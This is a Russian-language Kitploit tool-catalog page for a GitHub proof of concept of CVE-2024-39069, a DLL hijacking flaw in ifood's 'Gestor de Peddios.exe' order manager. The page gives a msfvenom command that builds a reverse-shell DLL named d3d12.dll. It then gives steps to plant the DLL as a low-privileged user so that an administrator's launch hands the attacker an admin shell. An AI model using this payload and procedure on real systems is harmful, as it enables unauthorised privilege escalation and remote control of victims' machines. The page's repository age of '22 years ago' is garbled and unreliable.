Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-39069 — CVE-2024-39069 | Kitploit
Инструменты/GitHubGitHub/aungsoepaing/cve-2024-39069
Повышение привилегийГенерация полезной нагрузкиЭксплуатацияШелл-кодТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubaungsoepaing/cve-2024-39069

CVE-2024-39069

CVE-2024-39069

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ifood Order Manager 'Gestor de Peddios.exe' - Перехват DLL

Злоумышленник помещает вредоносную DLL с именем "d3d12.dll" в каталог, который приложение проверяет раньше, чем найдет легитимную "d3d12.dll". При запуске приложения оно загружает вредоносную DLL вместо легитимной, что позволяет злоумышленнику выполнять произвольный код в контексте приложения.

Домашняя страница поставщика: https://gestordepedidos.ifood.com.br/

Google Диск: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing

Видео POC: https://youtu.be/oMIobV2M0T8

POC

  1. Создайте вредоносный DLL-файл в Kali Linux с помощью msfvenom

    root@kitploit:~
    msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
    
  2. Перенесите созданный файл 'd3d12.dll' на хост Windows из Kali с доступом от имени пользователя с низкими привилегиями

  3. Переместите созданный файл 'd3d12.dll' в 'C:\Gestor de Peddios\d3d12.dll' с доступом от имени пользователя с низкими привилегиями

  4. Когда администратор запустит приложение, вы получите обратную оболочку (reverse shell) с правами администратора

Скачать инструмент